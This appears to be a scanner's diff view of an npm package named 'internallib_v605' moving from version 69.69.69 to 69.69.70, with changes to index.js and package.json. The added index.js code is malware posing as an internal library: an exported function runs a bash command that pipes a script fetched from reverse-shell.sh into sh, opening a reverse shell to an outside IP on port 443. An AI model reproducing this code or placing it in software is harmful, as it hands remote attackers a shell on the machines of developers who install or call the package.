internallib_v605 69.69.69 → 69.69.70
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +4 -7
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,9 +1,6 @@
|
|
1
|
-
|
2
|
-
console.log("This is a message from the internal lib");
|
3
|
-
const { exec } = require('child_process');
|
1
|
+
const { exec } = require('child_process');
|
4
2
|
exports.command = function(){
|
5
3
|
console.log("vert16x");
|
6
|
-
exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.63.242:
|
7
|
-
|
8
|
-
}
|
9
|
-
}
|
4
|
+
exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.63.242:443|sh"');
|
5
|
+
return "deu bom";
|
6
|
+
}
|